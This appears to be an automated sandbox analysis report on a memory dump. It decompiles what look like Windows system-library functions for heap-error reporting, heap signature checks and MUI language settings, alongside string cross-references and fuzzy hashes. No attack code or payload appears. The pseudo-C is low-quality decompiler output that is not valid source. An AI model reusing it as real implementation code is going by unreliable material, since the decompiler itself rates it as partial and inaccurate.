The resource is owned exclusively by thread %p, xrefs: 01BEB374
Go determine why that thread has not released the critical section., xrefs: 01BEB3C5
write to, xrefs: 01BEB4A6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01BEB484
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01BEB53F
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01BEB3D6
This failed because of error %Ix., xrefs: 01BEB446
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01BEB47D
*** Resource timeout (%p) in %ws:%s, xrefs: 01BEB352
*** Inpage error in %ws:%s, xrefs: 01BEB418
a NULL pointer, xrefs: 01BEB4E0
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01BEB314
*** enter .exr %p for the exception record, xrefs: 01BEB4F1
The instruction at %p tried to %s , xrefs: 01BEB4B6

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 407acb99f82888eb3c02dea6052804234a0801e1aa8445fd8cb31bd28cfa89e5
Instruction ID: db7348d478babc684a2c05f31147cd011aa753bdf0d8abb92a63b1a0475eb610
Opcode Fuzzy Hash: 407acb99f82888eb3c02dea6052804234a0801e1aa8445fd8cb31bd28cfa89e5
Instruction Fuzzy Hash: 60810135A40220FFDF2D6A4ACD8ED6B3BB5EF56B52F4000CDF5082B122D3619541CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 01BF1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01BF1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x1b148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E01B3B150();
				} else {
					E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1c2589c);
				E01B3B150("Heap error detected at %p (heap handle %p)\n",  *0x1c258a0);
				_t27 =  *0x1c25898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01BF1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E01B3B150();
				} else {
					E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E01B3B150("Error code: %d - %s\n",  *0x1c25898);
				_t113 =  *0x1c258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01B3B150("Parameter1: %p\n",  *0x1c258a4);
				}
				_t115 =  *0x1c258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01B3B150("Parameter2: %p\n",  *0x1c258a8);
				}
				_t117 =  *0x1c258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01B3B150("Parameter3: %p\n",  *0x1c258ac);
				}
				_t119 =  *0x1c258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1c258b4);
					E01B3B150("Last known valid blocks: before - %p, after - %p\n",  *0x1c258b0);
				} else {
					_t120 =  *0x1c258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E01B3B150();
				} else {
					E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E01B3B150("Stack trace available at %p\n", 0x1c258c0);
			}

0x01bf1c10
0x01bf1c16
0x01bf1c1e
0x01bf1c3d
0x01bf1c3e
0x01bf1c20
0x01bf1c35
0x01bf1c3a
0x01bf1c44
0x01bf1c55
0x01bf1c5a
0x01bf1c65
0x01bf1c67
0x00000000
0x01bf1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01bf1c67
0x01bf1cdc
0x01bf1ce5
0x01bf1d04
0x01bf1d05
0x01bf1ce7
0x01bf1cfc
0x01bf1d01
0x01bf1d0b
0x01bf1d17
0x01bf1d1f
0x01bf1d25
0x01bf1d30
0x01bf1d4f
0x01bf1d50
0x01bf1d32
0x01bf1d47
0x01bf1d4c
0x01bf1d61
0x01bf1d67
0x01bf1d68
0x01bf1d6e
0x01bf1d79
0x01bf1d98
0x01bf1d99
0x01bf1d7b
0x01bf1d90
0x01bf1d95
0x01bf1daa
0x01bf1db0
0x01bf1db1
0x01bf1db7
0x01bf1dc2
0x01bf1de1
0x01bf1de2
0x01bf1dc4
0x01bf1dd9
0x01bf1dde
0x01bf1df3
0x01bf1df9
0x01bf1dfa
0x01bf1e00
0x01bf1e0a
0x01bf1e13
0x01bf1e32
0x01bf1e33
0x01bf1e15
0x01bf1e2a
0x01bf1e2f
0x01bf1e39
0x01bf1e4a
0x01bf1e02
0x01bf1e02
0x01bf1e08
0x00000000
0x00000000
0x01bf1e08
0x01bf1e5b
0x01bf1e7a
0x01bf1e7b
0x01bf1e5d
0x01bf1e72
0x01bf1e77
0x01bf1e95

Strings

HEAP[%wZ]: , xrefs: 01BF1C30, 01BF1CF7, 01BF1D42, 01BF1D8B, 01BF1DD4, 01BF1E25, 01BF1E6D
Parameter3: %p, xrefs: 01BF1DEE
heap_failure_buffer_overrun, xrefs: 01BF1C98
heap_failure_generic, xrefs: 01BF1C7C
heap_failure_multiple_entries_corruption, xrefs: 01BF1C8A
Stack trace available at %p, xrefs: 01BF1E86
Error code: %d - %s, xrefs: 01BF1D12
heap_failure_buffer_underrun, xrefs: 01BF1C9F
Parameter1: %p, xrefs: 01BF1D5C
HEAP: , xrefs: 01BF1C16, 01BF1C3D, 01BF1D04, 01BF1D4F, 01BF1D98, 01BF1DE1, 01BF1E32, 01BF1E7A
heap_failure_unknown, xrefs: 01BF1C75
heap_failure_lfh_bitmap_mismatch, xrefs: 01BF1CD7
heap_failure_invalid_allocation_type, xrefs: 01BF1CB4
heap_failure_usage_after_free, xrefs: 01BF1CBB
heap_failure_virtual_block_corruption, xrefs: 01BF1C91
heap_failure_entry_corruption, xrefs: 01BF1C83
Parameter2: %p, xrefs: 01BF1DA5
heap_failure_freelists_corruption, xrefs: 01BF1CC9
Last known valid blocks: before - %p, after - %p, xrefs: 01BF1E45
heap_failure_invalid_argument, xrefs: 01BF1CAD
heap_failure_listentry_corruption, xrefs: 01BF1CD0
heap_failure_cross_heap_operation, xrefs: 01BF1CC2
heap_failure_block_not_busy, xrefs: 01BF1CA6
Heap error detected at %p (heap handle %p), xrefs: 01BF1C50
heap_failure_internal, xrefs: 01BF1C6E

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 9b8ac5b054cff68160d65669a806eceacb5b164af8d7f5937e8ebdffc555fa35
Instruction ID: 123f021d6d2499172e61c7da4a6dcccbe1fc5b964ad75e8559ea8d003f01f06e
Opcode Fuzzy Hash: 9b8ac5b054cff68160d65669a806eceacb5b164af8d7f5937e8ebdffc555fa35
Instruction Fuzzy Hash: F9610D37970551CFC62DAB8FD584E2573A4EB14A30B0984EEFA0E6F314D7B4D8598B0A

Uniqueness

Uniqueness Score: -1.00%

Function 01B43D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01B43D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01B41B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01B41B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01B41B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01B41B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01B41B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01B54620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E01B7F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01B81370(_t276, 0x1b14e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E01B7BB40(0,  &_v68, _t170);
									if(L01B443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E01B7BB40(_t257,  &_v68, _t243);
								if(L01B443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01B81370(_t278, 0x1b14e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01B54620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E01B7F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01B81370(_v16, 0x1b14e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E01B7BB40(_t262,  &_v68, _t244);
								if(L01B443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01B81370(_t282, 0x1b14e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E01B7BB40(_t262,  &_v68, _t201);
							if(L01B443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01B54620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E01B7F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01B81370(_t280, 0x1b14e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E01B7BB40(_t267,  &_v68, _t245);
							if(L01B443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01B81370(_t284, 0x1b14e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E01B7BB40(_t267,  &_v68, _t224);
						if(L01B443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01b43d3c
0x01b43d42
0x01b43d44
0x01b43d46
0x01b43d49
0x01b43d4c
0x01b43d4f
0x01b43d52
0x01b43d55
0x01b43d58
0x01b43d5b
0x01b43d5f
0x01b43d61
0x01b43d66
0x01b98213
0x01b98218
0x01b44085
0x01b44088
0x01b4408e
0x01b44094
0x01b4409a
0x01b440a0
0x01b440a6
0x01b440a9
0x01b440af
0x01b440b6
0x01b440bd
0x01b440bd
0x01b43d83
0x01b9821f
0x01b98229
0x01b98238
0x01b98238
0x01b9823d
0x01b9823d
0x01b43da0
0x01b43daf
0x01b43db5
0x01b43dba
0x01b43dba
0x01b43dd4
0x01b43e94
0x01b43eab
0x01b43f6d
0x01b43f84
0x01b4406b
0x01b4406b
0x01b4406e
0x01b4406e
0x01b44070
0x01b44074
0x01b98351
0x01b98351
0x01b4407a
0x01b4407f
0x01b9835d
0x01b98370
0x01b98377
0x01b98379
0x01b9837c
0x01b9837c
0x01b9835d
0x00000000
0x01b4407f
0x01b43f8a
0x01b43f8d
0x01b43f90
0x01b43f95
0x01b9830d
0x01b9830f
0x01b43f9b
0x01b43fac
0x01b43fae
0x01b43fb1
0x01b43fb1
0x01b43fb6
0x01b98317
0x01b9831a
0x00000000
0x01b43fbc
0x01b43fc1
0x01b43fc9
0x01b43fd7
0x01b43fda
0x01b43fdd
0x01b44021
0x01b44021
0x01b44029
0x01b44030
0x01b44044
0x01b44046
0x01b44046
0x01b44044
0x01b44049
0x01b98327
0x01b98334
0x01b98339
0x01b9833c
0x01b4404f
0x01b4404f
0x01b4404f
0x01b44051
0x01b44056
0x01b44063
0x01b44063
0x01b44068
0x00000000
0x01b44068
0x01b43fdf
0x01b43fe2
0x01b43fe4
0x01b43fe7
0x01b43fef
0x01b44003
0x01b44005
0x01b44005
0x01b4400c
0x01b44013
0x01b44016
0x01b44017
0x01b4401b
0x01b4401e
0x00000000
0x01b4401e
0x01b43fb6
0x01b43eb1
0x01b43eb4
0x01b43eb7
0x01b43ebc
0x01b982a9
0x01b982ab
0x01b43ec2
0x01b43ed3
0x01b43ed5
0x01b43ed8
0x01b43ed8
0x01b43edd
0x01b982b3
0x01b982b6
0x00000000
0x01b43ee3
0x01b43ee8
0x01b43eed
0x01b43ef0
0x01b43ef3
0x01b43f02
0x01b43f05
0x01b43f08
0x01b982c0
0x01b982c3
0x01b982c5
0x01b982c8
0x01b982d0
0x01b982e4
0x01b982e6
0x01b982e6
0x01b982ed
0x01b982f4
0x01b982f7
0x01b982f8
0x01b982fc
0x01b982ff
0x01b982ff
0x01b43f0e
0x01b43f11
0x01b43f16
0x01b43f1d
0x01b43f31
0x01b98307
0x01b98307
0x01b43f31
0x01b43f39
0x01b43f48
0x01b43f4d
0x01b43f50
0x01b43f50
0x01b43f53
0x01b43f58
0x01b43f65
0x01b43f65
0x01b43f6a
0x00000000
0x01b43f6a
0x01b43edd
0x01b43dda
0x01b43ddd
0x01b43de0
0x01b43de5
0x01b98245
0x01b43deb
0x01b43df7
0x01b43dfc
0x01b43dfe
0x01b43e01
0x01b43e01
0x01b43e06
0x01b9824d
0x01b9824f
0x01b98254
0x00000000
0x01b43e0c
0x01b43e11
0x01b43e16
0x01b43e19
0x01b43e29
0x01b43e2c
0x01b43e2f
0x01b9825c
0x01b9825f
0x01b98261
0x01b98264
0x01b9826c
0x01b98280
0x01b98282
0x01b98282
0x01b98289
0x01b98290
0x01b98293
0x01b98294
0x01b98298
0x01b9829b
0x01b9829b
0x01b43e35
0x01b43e38
0x01b43e3d
0x01b43e44
0x01b43e58
0x01b982a3
0x01b982a3
0x01b43e58
0x01b43e60
0x01b43e6f
0x01b43e74
0x01b43e77
0x01b43e77
0x01b43e7a
0x01b43e7f
0x01b43e8c
0x01b43e8c
0x01b43e91
0x00000000
0x01b43e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 01B43D8C
WindowsExcludedProcs, xrefs: 01B43D6F
Kernel-MUI-Language-Allowed, xrefs: 01B43DC0
Kernel-MUI-Language-Disallowed, xrefs: 01B43E97
Kernel-MUI-Language-SKU, xrefs: 01B43F70

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: efce617da600aaa9f3185dd7a1730829dc1b95072118b41c433f36b91930df37
Instruction ID: 307ac14d763f1c2ec55d633435c0446ac5699601decf60af28b7da359e5df84f
Opcode Fuzzy Hash: efce617da600aaa9f3185dd7a1730829dc1b95072118b41c433f36b91930df37
Instruction Fuzzy Hash: 6FF14D72D01619EFCF19DF98C980AEEBBB9FF08650F1541AAE905E7210D7349E01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01B340E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E01B340E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01B3B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E01B3B150(", passed to %s", _t29);
					}
					_push("\n");
					E01B3B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1c26378 = 1;
						asm("int3");
						 *0x1c26378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x01b340e6
0x01b340e8
0x01b340f1
0x01b9042d
0x01b9044c
0x01b90451
0x01b9042f
0x01b90444
0x01b90449
0x01b9045d
0x01b90466
0x01b9046e
0x01b90474
0x01b90475
0x01b9047a
0x01b9048a
0x01b9048c
0x01b90493
0x01b90494
0x01b90494
0x00000000
0x01b9049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01B9043F
HEAP: , xrefs: 01B9044C
RtlAllocateHeap, xrefs: 01B90468
, passed to %s, xrefs: 01B90469
Invalid heap signature for heap at %p, xrefs: 01B90458

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: e9aff27ec46c16e0785bd25a5b26fb5b502d35280f2ca38aefccc77eea84d65f
Instruction ID: 3077ab4139d8d086c17ce78a5601efbe95af81b76c3485b15b7541d4f8e57794
Opcode Fuzzy Hash: e9aff27ec46c16e0785bd25a5b26fb5b502d35280f2ca38aefccc77eea84d65f
Instruction Fuzzy Hash: 870170321216419FD72DAB6AE50EF56B7B8DB81F30F1940FEF00547755CBE49441C620

Uniqueness

Uniqueness Score: -1.00%

Function 01B5A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E01B5A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1c28748 - 1;
					if( *0x1c28748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E01B3B150();
									_t260 = _t257 + 4;
								} else {
									E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E01B3B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1c27bc8;
								if(__eflags == 0) {
									E01BF2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E01BFA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
